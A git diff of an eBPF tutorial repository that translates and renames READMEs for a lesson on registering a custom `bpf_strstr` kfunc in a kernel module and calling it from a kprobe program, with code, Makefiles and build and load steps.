restrictions that limit loops and complex memory accesses. By implementing `strstr` as a kfunc, we bypass these limitations, allowing for more complex and efficient string operations within eBPF programs. -1. **导航到 eBPF 程序目录:** +### Compiling the eBPF Program + +To compile the eBPF program, ensure you have the necessary tools installed, such as `clang` and `llvm`. Here's how you can compile the program: + +1. **Navigate to the eBPF Program Directory:** ```bash cd /path/to/bpf-developer-tutorial/src/43-kfuncs/ ``` -2. **为 eBPF 程序创建一个 `Makefile`:** +2. **Create a `Makefile` for the eBPF Program:** ```makefile - # 文件:Makefile + # File: Makefile CLANG ?= clang LLVM_STRIP ?= llvm-strip @@ -378,68 +378,68 @@ int handle_kprobe(struct pt_regs *ctx) rm -f kfunc.o ``` -3. **编译 eBPF 程序:** +3. **Compile the eBPF Program:** ```bash make ``` - 该命令将生成一个名为 `kfunc.o` 的文件,即编译后的 eBPF 对象文件。 + This command will generate a file named `kfunc.o`, which is the compiled eBPF object file. -### 运行 eBPF 程序 +### Running the eBPF Program -假设你有一个用户空间应用程序或工具来加载和附加 eBPF 程序,你可以执行它以观察 eBPF 程序与自定义 kfunc 之间的交互。 +Assuming you have a user-space application or a tool to load and attach the eBPF program, you can execute it to observe the interaction between the eBPF program and the custom kfunc. -**示例输出:** +**Sample Output:** ```bash # sudo ./load_kfunc -BPF 程序已加载并成功附加。按 Ctrl-C 退出。 +BPF program loaded and attached successfully. Press Ctrl-C to exit. ``` -然后,当调用 `do_unlinkat` 函数时(例如,当文件被取消链接时),你可以检查内核日志: +Then, when the `do_unlinkat` function is invoked (e.g., when a file is unlinked), you can check the kernel logs: ```bash dmesg | tail ``` -**预期输出:** +**Expected Output:** ```txt [ 1234.5678] 'wor' found in 'Hello, world!' at index 7 [ 1234.5679] Hello, world! (pid: 2075) bpf_strstr 7 ``` -**输出解释:** +**Explanation of the Output:** -每次内核调用 `do_unlinkat` 函数时,eBPF 程序都会打印一条消息,指示进程的 PID 以及 kfunc 调用的结果。在此示例中,子字符串 `"wor"` 在字符串 `"Hello, world!"` 的索引 `7` 处被找到。 +Each time the `do_unlinkat` function is invoked in the kernel, the eBPF program prints a message indicating the PID of the process and the result of the kfunc call. In this example, the substring `"wor"` is found at index `7` in the string `"Hello, world!"`. -## 总结与结论 +## Summary and Conclusion -在本教程中,我们深入探讨了通过定义和使用自定义内核函数(kfuncs)来扩展 eBPF 的能力。以下是我们涵盖的内容回顾: +In this tutorial, we've delved deep into extending eBPF's capabilities by defining and utilizing custom kernel functions (kfuncs). Here's a recap of what we've covered: -- **理解 kfuncs:** 理解了 kfuncs 的概念及其在标准辅助函数之外增强 eBPF 的角色。 -- **定义 kfuncs:** 创建了一个内核模块,定义了自定义的 `strstr` kfunc,确保其能够安全地暴露给 eBPF 程序,而无需修改核心内核。 -- **编写包含 kfuncs 的 eBPF 程序:** 开发了一个利用自定义 kfunc 的 eBPF 程序,展示了增强的功能。 -- **编译与执行:** 提供了逐步指南,编译、加载并运行内核模块和 eBPF 程序,确保你可以在自己的系统上复制设置。 -- **错误处理:** 解决了潜在的编译问题,并提供了解决方案,确保顺利的开发体验。 +- **Understanding kfuncs:** Grasped the concept of kfuncs and their role in enhancing eBPF beyond standard helper functions. +- **Defining kfuncs:** Created a kernel module that defines a custom `strstr` kfunc, ensuring it can be safely exposed to eBPF programs without altering the core kernel. +- **Writing eBPF Programs with kfuncs:** Developed an eBPF program that leverages the custom kfunc to perform specific operations, demonstrating the enhanced functionality. +- **Compilation and Execution:** Provided a step-by-step guide to compile, load, and run both the kernel module and the eBPF program, ensuring you can replicate the setup on your own system. +- **Error Handling:** Addressed potential compilation issues and offered solutions to ensure a smooth development experience. -**关键要点:** +**Key Takeaways:** -- **克服辅助函数的限制:** kfuncs 弥合了标准 eBPF 辅助函数留下的空白,提供了针对特定需求的扩展功能。 -- **维护系统稳定性:** 通过将 kfuncs 封装在内核模块中,确保系统稳定性,而无需对内核进行侵入性更改。 -- **社区驱动的演变:** kfuncs 的快速增长和采用凸显了 eBPF 社区致力于通过 kfuncs 推动内核级编程可能性的决心。 -- **利用现有 kfuncs:** 在定义新的 kfuncs 之前,探索内核提供的现有 kfuncs。它们涵盖了广泛的功能,减少了除非绝对必要,否则无需创建自定义函数的需求。 +- **Overcoming Helper Limitations:** kfuncs bridge the gaps left by standard eBPF helpers, offering extended functionality tailored to specific needs. +- **Maintaining System Stability:** By encapsulating kfuncs within kernel modules, you ensure that system stability is maintained without making invasive changes to the kernel. +- **Community-Driven Evolution:** The rapid growth and adoption of kfuncs highlight the eBPF community's commitment to pushing the boundaries of what's possible with kernel-level programming. +- **Leveraging Existing kfuncs:** Before defining new kfuncs, explore the existing ones provided by the kernel. They cover a wide range of functionalities, reducing the need to create custom functions unless absolutely necessary. -**准备好进一步提升你的 eBPF 技能了吗?** [访问我们的教程仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial)并[探索我们网站上的更多教程](https://eunomia.dev/tutorials/)。深入丰富的示例,深化你的理解,并为 eBPF 的动态世界做出贡献! +**Ready to elevate your eBPF skills even further?** [Visit our tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) and [explore more tutorials on our website](https://eunomia.dev/tutorials/). Dive into a wealth of examples, deepen your understanding, and contribute to the dynamic world of eBPF! -祝你在 eBPF 的旅程中愉快! +Happy eBPF-ing! -## 参考资料 +## References -- [BPF 内核函数文档](https://docs.kernel.org/bpf/kfuncs.html) -- [eBPF kfuncs 指南](https://docs.ebpf.io/linux/kfuncs/) +- [BPF Kernel Functions Documentation](https://docs.kernel.org/bpf/kfuncs.html) +- [eBPF kfuncs Guide](https://docs.ebpf.io/linux/kfuncs/) -## 附加资源 +## Additional Resources -如果你想了解更多关于 eBPF 的知识和实践,可以访问我们的开源教程代码仓库 [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或访问我们的网站 [eunomia.dev/tutorials](https://eunomia.dev/tutorials/) 以获取更多示例和完整代码。 +If you'd like to learn more about eBPF knowledge and practices, you can visit our open-source tutorial code repository at [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [eunomia.dev/tutorials](https://eunomia.dev/tutorials/) for more examples and complete code. diff --git a/src/43-kfuncs/README.zh.md b/src/43-kfuncs/README.zh.md new file mode 100644 index 0000000..f80f394 --- /dev/null +++ b/src/43-kfuncs/README.zh.md @@ -0,0 +1,445 @@ +# 超越 eBPF 的极限:在内核模块中定义自定义 kfunc + +你是否曾经觉得 eBPF 的能力有限?也许你遇到了现有 eBPF 功能无法实现目标的情况。或许你需要与内核进行更深层次的交互,或者标准 eBPF 运行时无法解决的性能问题。如果你曾经希望在 eBPF 程序中拥有更多的灵活性和强大功能,那么本教程正适合你。 + +## 引言:添加 `strstr` kfunc 以突破 eBPF 运行时的限制 + +**eBPF(扩展伯克利包过滤器)** 通过允许开发者在内核中运行受沙箱限制的程序,彻底改变了 Linux 系统编程。它在网络、安全和可观测性方面具有革命性的作用,能够实现强大的功能,而无需修改内核源代码或加载传统的内核模块。 + +但尽管 eBPF 非常强大,它也并非没有局限性: + +- **功能差距:** 有时,eBPF 运行时的现有功能无法提供你所需的特定能力。 +- **复杂需求:** 某些任务需要更复杂的内核交互,而 eBPF 无法开箱即用地处理这些需求。 +- **性能问题:** 在某些情况下,eBPF 运行时的开销会引入延迟,或者在高性能需求下效率不够。 + +这些挑战源于**整个 eBPF 运行时的限制**,而不仅仅是其辅助函数。那么,如何在不修改内核本身的情况下克服这些障碍呢? + +引入**kfunc(BPF 内核函数)**。通过在内核模块中定义你自己的 kfunc,可以将 eBPF 的能力扩展到默认限制之外。这种方法让你能够: + +- **增强功能:** 引入标准 eBPF 运行时中不可用的新操作。 +- **定制行为:** 根据你的特定需求定制内核交互。 +- **提升性能:** 通过在内核上下文中直接执行自定义代码,优化关键路径。 + +**在本教程中,我们将特别添加一个 `strstr` kfunc。** 由于 eBPF 的验证器限制,直接在 eBPF 中实现字符串搜索是具有挑战性的,而将其定义为 kfunc 则允许我们安全高效地绕过这些限制,执行更复杂的操作。 + +最棒的是,你可以在不修改核心内核的情况下实现这一目标,保持系统的稳定性和代码的安全性。 + +在本教程中,我们将展示如何定义自定义 kfunc 以填补 eBPF 功能的任何空白。我们将逐步讲解如何创建一个引入新 kfunc 的内核模块,并演示如何在 eBPF 程序中使用它们。无论你是希望克服性能瓶颈,还是需要 eBPF 运行时未提供的功能,自定义 kfunc 都能为你的项目解锁新的可能性。 + +## 理解 kfunc:扩展 eBPF 超越辅助函数 + +### 什么是 kfunc? + +**BPF 内核函数(kfuncs)** 是 Linux 内核中的专用函数,供 eBPF 程序使用。与标准的 eBPF 辅助函数不同,kfuncs 没有稳定的接口,并且在不同的内核版本之间可能有所变化。这种可变性意味着使用 kfuncs 的 BPF 程序需要与内核更新同步更新,以保持兼容性和稳定性。 + +### 为什么使用 kfuncs? + +1. **扩展功能:** kfuncs 允许执行标准 eBPF 辅助函数无法完成的操作。 +2. **定制化:** 定义针对特定用例量身定制的逻辑,增强 eBPF 程序的灵活性。 +3. **安全与稳定:** 通过将 kfuncs 封装在内核模块中,避免直接修改核心内核,保持系统完整性。 + +### kfuncs 在 eBPF 中的角色 + +kfuncs 作为 eBPF 程序与更深层次内核功能之间的桥梁。它们允许 eBPF 程序执行更复杂的操作,通过暴露现有内核函数或引入专为 eBPF 交互设计的新包装函数。这种集成在确保 eBPF 程序保持安全和可维护的同时,促进了更深入的内核交互。 + +需要注意的是,Linux 内核已经包含了大量的 kfuncs。这些内置的 kfuncs 覆盖了广泛的功能,大多数开发者无需定义新的 kfuncs 就能完成任务。然而,在现有 kfuncs 无法满足特定需求的情况下,定义自定义 kfuncs 就变得必要。本教程将演示如何定义新的 kfuncs 以填补任何空白,确保你的 eBPF 程序能够利用你所需的确切功能。eBPF 也可以扩展到用户空间。在用户空间 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime) 中,我们也在实现 ufuncs,它们类似于 kfuncs,但扩展了用户空间应用程序。 + +## kfuncs 及其演变概述 + +要理解 kfuncs 的重要性,必须了解它们与 eBPF 辅助函数的演变关系。 + +![累计辅助函数和 kfunc 时间线](https://raw.githubusercontent.com/eunomia-bpf/code-survey/main/imgs/cumulative_helper_kfunc_timeline.png) + +**关键要点:** + +- **辅助函数的稳定性:** eBPF 辅助函数保持了高度的稳定性,新增内容较少。 +- **kfuncs 的快速增长:** kfuncs 的采用和创建显著增加,表明社区有兴趣通过 kfuncs 扩展内核交互。 +- **向更深层次内核集成的转变:** 自 2023 年以来,新的用例主要利用 kfuncs 影响内核行为,显示出通过 kfuncs 实现更深层次内核集成的趋势。 + +这一趋势凸显了社区通过 kfuncs 更深入地与内核集成,推动 eBPF 能力边界的决心。 + +## 定义你自己的 kfunc:分步指南 + +为了利用 kfuncs 的强大功能,你需要在内核模块中定义它们。这个过程确保你的自定义函数能够安全地暴露给 eBPF 程序,而无需修改核心内核。 + +### 编写内核模块 + +让我们从创建一个简单的内核模块开始,该模块定义一个 `strstr` kfunc。这个 kfunc 将执行子字符串搜索操作,作为理解机制的基础。 + +#### **文件:`hello.c`** + +```c +#include // 模块初始化宏 +#include // 加载模块的核心头文件 +#include // 内核日志宏 +#include +#include +#include + +/* 声明 kfunc 原型 */ +__bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz); + +/* 开始 kfunc 定义 */ +__bpf_kfunc_start_defs(); + +/* 定义 bpf_strstr kfunc */ +__bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) +{ + // 边界情况:如果 substr 为空,返回 0(假设空字符串在开始处找到) + if (substr__sz == 0) + { + return 0; + } + // 边界情况:如果子字符串比主字符串长,则无法找到 + if (substr__sz > str__sz) + { + return -1; // 返回 -1 表示未找到 + } + // 遍历主字符串,考虑大小限制 + for (size_t i = 0; i <= str__sz - substr__sz; i++) + { + size_t j = 0; + // 将子字符串与当前主字符串位置进行比较 + while (j < substr__sz && str[i + j] == substr[j]) + { + j++; + } + // 如果整个子字符串都匹配 + if (j == substr__sz) + { + return i; // 返回第一次匹配的索引 + } + } + // 如果未找到子字符串,返回 -1 + return -1; +} + +/* 结束 kfunc 定义 */ +__bpf_kfunc_end_defs(); + +/* 定义 BTF kfuncs ID 集 */ +BTF_KFUNCS_START(bpf_kfunc_example_ids_set) +BTF_ID_FLAGS(func, bpf_strstr) +BTF_KFUNCS_END(bpf_kfunc_example_ids_set) + +/* 注册 kfunc ID 集 */ +static const struct btf_kfunc_id_set bpf_kfunc_example_set = { + .owner = THIS_MODULE, + .set = &bpf_kfunc_example_ids_set, +}; + +/* 模块加载时执行的函数 */ +static int __init hello_init(void) +{ + int ret; + + printk(KERN_INFO "Hello, world!\n"); + /* 注册 BPF_PROG_TYPE_KPROBE 的 BTF kfunc ID 集 */ + ret = register_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set); + if (ret) + { + pr_err("bpf_kfunc_example: 注册 BTF kfunc ID 集失败\n"); + return ret; + } + printk(KERN_INFO "bpf_kfunc_example: 模块加载成功\n"); + return 0; // 成功返回 0 +} + +/* 模块卸载时执行的函数 */ +static void __exit hello_exit(void) +{ + /* 取消注册 BTF kfunc ID 集 */ + unregister_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set); + printk(KERN_INFO "再见,世界!\n"); +} + +/* 定义模块的初始化和退出点的宏 */ +module_init(hello_init); +module_exit(hello_exit); + +MODULE_LICENSE("GPL"); // 许可证类型(GPL) +MODULE_AUTHOR("Your Name"); // 模块作者 +MODULE_DESCRIPTION("一个简单的模块"); // 模块描述 +MODULE_VERSION("1.0"); // 模块版本 +``` + +**代码解释:** + +- **声明 kfunc:** `__bpf_kfunc` 宏声明一个 eBPF 程序可以调用的函数。在这里,`bpf_strstr` 执行给定字符串中的子字符串搜索。 + +- **BTF 定义:** `__bpf_kfunc_start_defs` 和 `__bpf_kfunc_end_defs` 宏标示 kfunc 定义的开始和结束。`BTF_KFUNCS_START` 及相关宏帮助将 kfuncs 注册到 BPF 类型格式(BTF)。 + +- **模块初始化:** `hello_init` 函数注册 kfunc ID 集,使 `bpf_strstr` 可用于 `BPF_PROG_TYPE_KPROBE` 类型的 eBPF 程序。 + +- **模块清理:** `hello_exit` 函数确保在模块移除时取消注册 kfunc ID 集,保持系统整洁。 + +#### **文件:`Makefile`** + +```makefile +obj-m += hello.o # hello.o 是目标 + +# 启用 BTF 生成 +KBUILD_CFLAGS += -g -O2 + +all: + make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules + +clean: + make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean +``` + +**Makefile 解释:** + +- **目标定义:** `obj-m += hello.o` 指定 `hello.o` 是要构建的模块。 + +- **BTF 生成标志:** `KBUILD_CFLAGS += -g -O2` 启用调试信息和优化,便于 BTF 生成。 + +- **构建命令:** + - **`all`:** 通过调用内核构建系统编译内核模块。 + - **`clean`:** 清理构建产物。 + +**注意:** 提供的代码在 Linux 内核版本 **6.11** 上进行了测试。如果你使用的是较早的版本,可能需要实现一些变通方法,例如引用 `compact.h`。 + +### 编译内核模块 + +在内核模块源代码和 Makefile 就位后,按照以下步骤编译模块: + +1. **导航到模块目录:** + + ```bash + cd /path/to/bpf-developer-tutorial/src/43-kfuncs/module/ + ``` + +2. **编译模块:** + + ```bash + make + ``` + + 该命令将生成一个名为 `hello.ko` 的文件,即编译后的内核模块。 + +### 加载内核模块 + +要将编译好的模块插入内核,使用 `insmod` 命令: + +```bash +sudo insmod hello.ko +``` + +### 验证模块加载 + +加载模块后,通过检查内核日志验证其是否成功插入: + +```bash +dmesg | tail +``` + +**预期输出:** + +```txt +[ 1234.5678] Hello, world! +[ 1234.5679] bpf_kfunc_example: 模块加载成功 +``` + +### 移除内核模块 + +当不再需要该模块时,使用 `rmmod` 命令卸载它: + +```bash +sudo rmmod hello +``` + +**验证移除:** + +```bash +dmesg | tail +``` + +**预期输出:** + +```txt +[ 1234.9876] 再见,世界! +``` + +## 处理编译错误 + +在编译过程中,可能会遇到以下错误: + +```txt +Skipping BTF generation for /root/bpf-developer-tutorial/src/43-kfuncs/module/hello.ko due to unavailability of vmlinux +``` + +**解决方案:** + +1. **安装 `dwarves` 包:** + + `dwarves` 包提供了生成 BTF 所需的工具。 + + ```sh + sudo apt install dwarves + ``` + +2. **复制 `vmlinux` 文件:** + + 确保包含 BTF 信息的 `vmlinux` 文件在构建目录中可用。 + + ```sh + sudo cp /sys/kernel/btf/vmlinux /usr/lib/modules/$(uname -r)/build/ + ``` + + 该命令将 `vmlinux` 文件复制到适当的构建目录,确保成功生成 BTF。 + +本教程的完整代码可在 [bpf-developer-tutorial 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/43-kfuncs) 的 GitHub 上找到。此代码在 Linux 内核版本 6.11 上进行了测试,对于较低版本,可能需要参考 `compact.h` 进行一些修改。 + +## 在 eBPF 程序中使用自定义 kfunc + +有了定义自定义 `strstr` kfunc 的内核模块后,下一步是创建一个利用此函数的 eBPF 程序。此交互展示了 kfuncs 引入的增强功能。 + +### 编写 eBPF 程序 + +创建一个附加到 `do_unlinkat` 内核函数并使用自定义 `bpf_strstr` kfunc 的 eBPF 程序。 + +#### **文件:`kfunc.c`** + +```c +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#define BPF_NO_GLOBAL_DATA +#include +#include +#include + +typedef unsigned int u32; +typedef long long s64; + +/* 声明外部 kfunc */ +extern int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) __ksym; + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("kprobe/do_unlinkat") +int handle_kprobe(struct pt_regs *ctx) +{ + pid_t pid = bpf_get_current_pid_tgid() >> 32; + char str[] = "Hello, world!"; + char substr[] = "wor"; + int result = bpf_strstr(str, sizeof(str) - 1, substr, sizeof(substr) - 1); + if (result != -1) + { + bpf_printk("'%s' found in '%s' at index %d\n", substr, str, result); + } + bpf_printk("Hello, world! (pid: %d) bpf_strstr %d\n", pid, result); + return 0; +} +``` + +**eBPF 代码解释:** + +- **外部 kfunc 声明:** `extern` 关键字声明 `bpf_strstr` 函数,使其在 eBPF 程序中可用。 + +- **Kprobe 附加:** `SEC("kprobe/do_unlinkat")` 宏将 eBPF 程序附加到 `do_unlinkat` 内核函数。每次调用 `do_unlinkat` 时,`handle_kprobe` 函数都会执行。 + +- **使用 kfunc:** 在 `handle_kprobe` 中,eBPF 程序调用 `bpf_strstr`,传入四个参数: + - `str`: 要搜索的主字符串。 + - `str__sz`: 主字符串的大小。 + - `substr`: 要搜索的子字符串。 + - `substr__sz`: 子字符串的大小。 + + 结果(子字符串在主字符串中的首次出现索引,或 -1 表示未找到)然后通过 `bpf_printk` 打印,显示 PID 和结果。 + +**重要提示:** 由于验证器限制,直接在 eBPF 中实现类似 `strstr` 的函数具有挑战性,因为这限制了循环和复杂的内存访问。通过将 `strstr` 实现为 kfunc,我们绕过了这些限制,使得在 eBPF 程序中执行更复杂和高效的字符串操作成为可能。 + +### 编译 eBPF 程序 + +要编译 eBPF 程序,确保你已安装必要的工具,如 `clang` 和 `llvm`。以下是编译程序的步骤: + +1. **导航到 eBPF 程序目录:** + + ```bash + cd /path/to/bpf-developer-tutorial/src/43-kfuncs/ + ``` + +2. **为 eBPF 程序创建一个 `Makefile`:** + + ```makefile + # 文件:Makefile + + CLANG ?= clang + LLVM_STRIP ?= llvm-strip + BPF_TARGET := bpf + + CFLAGS := -O2 -g -target $(BPF_TARGET) -Wall -Werror -I/usr/include + + all: kfunc.o + + kfunc.o: kfunc.c + $(CLANG) $(CFLAGS) -c $< -o $@ + + clean: + rm -f kfunc.o + ``` + +3. **编译 eBPF 程序:** + + ```bash + make + ``` + + 该命令将生成一个名为 `kfunc.o` 的文件,即编译后的 eBPF 对象文件。 + +### 运行 eBPF 程序 + +假设你有一个用户空间应用程序或工具来加载和附加 eBPF 程序,你可以执行它以观察 eBPF 程序与自定义 kfunc 之间的交互。 + +**示例输出:** + +```bash +# sudo ./load_kfunc +BPF 程序已加载并成功附加。按 Ctrl-C 退出。 +``` + +然后,当调用 `do_unlinkat` 函数时(例如,当文件被取消链接时),你可以检查内核日志: + +```bash +dmesg | tail +``` + +**预期输出:** + +```txt +[ 1234.5678] 'wor' found in 'Hello, world!' at index 7 +[ 1234.5679] Hello, world! (pid: 2075) bpf_strstr 7 +``` + +**输出解释:** + +每次内核调用 `do_unlinkat` 函数时,eBPF 程序都会打印一条消息,指示进程的 PID 以及 kfunc 调用的结果。在此示例中,子字符串 `"wor"` 在字符串 `"Hello, world!"` 的索引 `7` 处被找到。 + +## 总结与结论 + +在本教程中,我们深入探讨了通过定义和使用自定义内核函数(kfuncs)来扩展 eBPF 的能力。以下是我们涵盖的内容回顾: + +- **理解 kfuncs:** 理解了 kfuncs 的概念及其在标准辅助函数之外增强 eBPF 的角色。 +- **定义 kfuncs:** 创建了一个内核模块,定义了自定义的 `strstr` kfunc,确保其能够安全地暴露给 eBPF 程序,而无需修改核心内核。 +- **编写包含 kfuncs 的 eBPF 程序:** 开发了一个利用自定义 kfunc 的 eBPF 程序,展示了增强的功能。 +- **编译与执行:** 提供了逐步指南,编译、加载并运行内核模块和 eBPF 程序,确保你可以在自己的系统上复制设置。 +- **错误处理:** 解决了潜在的编译问题,并提供了解决方案,确保顺利的开发体验。 + +**关键要点:** + +- **克服辅助函数的限制:** kfuncs 弥合了标准 eBPF 辅助函数留下的空白,提供了针对特定需求的扩展功能。 +- **维护系统稳定性:** 通过将 kfuncs 封装在内核模块中,确保系统稳定性,而无需对内核进行侵入性更改。 +- **社区驱动的演变:** kfuncs 的快速增长和采用凸显了 eBPF 社区致力于通过 kfuncs 推动内核级编程可能性的决心。 +- **利用现有 kfuncs:** 在定义新的 kfuncs 之前,探索内核提供的现有 kfuncs。它们涵盖了广泛的功能,减少了除非绝对必要,否则无需创建自定义函数的需求。 + +**准备好进一步提升你的 eBPF 技能了吗?** [访问我们的教程仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial)并[探索我们网站上的更多教程](https://eunomia.dev/tutorials/)。深入丰富的示例,深化你的理解,并为 eBPF 的动态世界做出贡献! + +祝你在 eBPF 的旅程中愉快! + +## 参考资料 + +- [BPF 内核函数文档](https://docs.kernel.org/bpf/kfuncs.html) +- [eBPF kfuncs 指南](https://docs.ebpf.io/linux/kfuncs/) + +## 附加资源 + +如果你想了解更多关于 eBPF 的知识和实践,可以访问我们的开源教程代码仓库 [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或访问我们的网站 [eunomia.dev/tutorials](https://eunomia.dev/tutorials/) 以获取更多示例和完整代码。 diff --git a/src/43-kfuncs/README_en.md b/src/43-kfuncs/README_en.md deleted file mode 100644 index a3ba587..0000000 --- a/src/43-kfuncs/README_en.md +++ /dev/null @@ -1,445 +0,0 @@ -# Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules - -Have you ever felt constrained by eBPF's capabilities? Maybe you've run into situations where the existing eBPF features just aren't enough to accomplish your goals. Perhaps you need deeper interactions with the kernel, or you're facing performance issues that the standard eBPF runtime can't solve. If you've ever wished for more flexibility and power in your eBPF programs, this tutorial is for you. - -## Introduction: Adding a `strstr` kfunc to Break Free from eBPF Runtime Limitations - -**eBPF (extended Berkeley Packet Filter)** has revolutionized Linux system programming by allowing developers to run sandboxed programs inside the kernel. It's a game-changer for networking, security, and observability, enabling powerful functionalities without the need to modify kernel source code or load traditional kernel modules. - -But as amazing as eBPF is, it isn't without its limitations: - -- **Functionality Gaps:** Sometimes, the existing features of the eBPF runtime don't provide the specific capabilities you need. -- **Complex Requirements:** Certain tasks demand more intricate kernel interactions that eBPF can't handle out of the box. -- **Performance Issues:** In some cases, the overhead of the eBPF runtime introduces latency or isn't efficient enough for high-performance requirements. - -These challenges stem from the limitations of the **entire eBPF runtime**, not just its helper functions. So how do you overcome these hurdles without altering the kernel itself? - -Enter **kfuncs (BPF Kernel Functions)**. By defining your own kfuncs within kernel modules, you can extend eBPF's capabilities beyond its default limitations. This approach lets you: - -- **Enhance Functionality:** Introduce new operations that aren't available in the standard eBPF runtime. -- **Customize Behavior:** Tailor kernel interactions to fit your specific needs. -- **Boost Performance:** Optimize critical paths by executing custom code directly in the kernel context. - -**In this tutorial, we'll specifically add a `strstr` kfunc.** While implementing a string search directly in eBPF is challenging due to verifier restrictions, defining it as a kfunc allows us to bypass these limitations and perform more complex operations safely and efficiently. - -Best of all, you achieve this without modifying the core kernel, keeping your system stable and your code safe. - -In this tutorial, we'll show you how to define custom kfuncs to fill any gaps in eBPF's capabilities. We'll walk through creating a kernel module that introduces new kfuncs and demonstrate how to use them in your eBPF programs. Whether you're looking to overcome performance bottlenecks or need features the eBPF runtime doesn't offer, custom kfuncs can unlock new possibilities for your projects. - -## Understanding kfunc: Extending eBPF Beyond Helpers - -### What Are kfuncs? - -**BPF Kernel Functions (kfuncs)** are specialized functions within the Linux kernel that are exposed for use by eBPF programs. Unlike standard eBPF helpers, kfuncs do not have a stable interface and can vary between kernel releases. This variability means that BPF programs utilizing kfuncs need to be updated in tandem with kernel updates to maintain compatibility and stability. - -### Why Use kfuncs? - -1. **Extended Functionality:** kfuncs enable operations that standard eBPF helpers cannot perform. -2. **Customization:** Define logic tailored to specific use cases, enhancing the flexibility of eBPF programs. -3. **Safety and Stability:** By encapsulating kfuncs within kernel modules, you avoid direct modifications to the core kernel, preserving system integrity. - -### How kfuncs Fit into eBPF - -kfuncs serve as bridges between eBPF programs and deeper kernel functionalities. They allow eBPF programs to perform more intricate operations by either exposing existing kernel functions or introducing new wrappers specifically designed for eBPF interactions. This integration facilitates deeper kernel interactions while ensuring that eBPF programs remain safe and maintainable. - -It's important to note that the Linux kernel already includes a plethora of kfuncs. These built-in kfuncs cover a wide range of functionalities, allowing most developers to accomplish their tasks without the need to define new ones. However, in cases where the existing kfuncs do not meet specific requirements, defining custom kfuncs becomes necessary. This tutorial demonstrates how to define new kfuncs to fill any gaps, ensuring that your eBPF programs can leverage the exact functionality you need. eBPF can also be extended to userspace. In the userspace eBPF runtime [bpftime](https://github.com/eunomia-bpf/bpftime), we are also implementing ufuncs, which are similar to kfuncs but extend userspace applications. - -## Overview of kfuncs and Their Evolution - -To appreciate the significance of kfuncs, it's essential to understand their evolution in relation to eBPF helper functions. - -![Cumulative Helper and kfunc Timeline](https://raw.githubusercontent.com/eunomia-bpf/code-survey/main/imgs/cumulative_helper_kfunc_timeline.png) - -**Key Takeaways:** - -- **Stability of Helper Functions:** eBPF helper functions have remained largely stable, with minimal new additions. -- **Rapid Growth of kfuncs:** There's been a significant increase in the adoption and creation of kfuncs, indicating the community's interest in expanding kernel interactions via kfuncs. -- **Shift Towards Deeper Kernel Integrations:** Since 2023, new use cases predominantly leverage kfuncs to influence kernel behavior, signaling a trend towards more profound kernel integrations through eBPF. - -This trend underscores the community's drive to push the boundaries of what eBPF can achieve by integrating more deeply with the kernel through kfuncs. - -## Defining Your Own kfunc: A Step-by-Step Guide - -To harness the power of kfuncs, you'll need to define them within a kernel module. This process ensures that your custom functions are safely exposed to eBPF programs without altering the core kernel. - -### Writing the Kernel Module - -Let's start by creating a simple kernel module that defines a `strstr` kfunc. This kfunc will perform a substring search operation, serving as a foundation for understanding the mechanics. - -#### **File: `hello.c`** - -```c -#include // Macros for module initialization -#include // Core header for loading modules -#include // Kernel logging macros -#include -#include -#include - -/* Declare the kfunc prototype */ -__bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz); - -/* Begin kfunc definitions */ -__bpf_kfunc_start_defs(); - -/* Define the bpf_strstr kfunc */ -__bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) -{ - // Edge case: if substr is empty, return 0 (assuming empty string is found at the start) - if (substr__sz == 0) - { - return 0; - } - // Edge case: if the substring is longer than the main string, it's impossible to find - if (substr__sz > str__sz) - { - return -1; // Return -1 to indicate not found - } - // Iterate through the main string, considering the size limit - for (size_t i = 0; i <= str__sz - substr__sz; i++) - { - size_t j = 0; - // Compare the substring with the current position in the string - while (j < substr__sz && str[i + j] == substr[j]) - { - j++; - } - // If the entire substring was found - if (j == substr__sz) - { - return i; // Return the index of the first match - } - } - // Return -1 if the substring is not found - return -1; -} - -/* End kfunc definitions */ -__bpf_kfunc_end_defs(); - -/* Define the BTF kfuncs ID set */ -BTF_KFUNCS_START(bpf_kfunc_example_ids_set) -BTF_ID_FLAGS(func, bpf_strstr) -BTF_KFUNCS_END(bpf_kfunc_example_ids_set) - -/* Register the kfunc ID set */ -static const struct btf_kfunc_id_set bpf_kfunc_example_set = { - .owner = THIS_MODULE, - .set = &bpf_kfunc_example_ids_set, -}; - -/* Function executed when the module is loaded */ -static int __init hello_init(void) -{ - int ret; - - printk(KERN_INFO "Hello, world!\n"); - /* Register the BTF kfunc ID set for BPF_PROG_TYPE_KPROBE */ - ret = register_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set); - if (ret) - { - pr_err("bpf_kfunc_example: Failed to register BTF kfunc ID set\n"); - return ret; - } - printk(KERN_INFO "bpf_kfunc_example: Module loaded successfully\n"); - return 0; // Return 0 if successful -} - -/* Function executed when the module is removed */ -static void __exit hello_exit(void) -{ - /* Unregister the BTF kfunc ID set */ - unregister_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set); - printk(KERN_INFO "Goodbye, world!\n"); -} - -/* Macros to define the module’s init and exit points */ -module_init(hello_init); -module_exit(hello_exit); - -MODULE_LICENSE("GPL"); // License type (GPL) 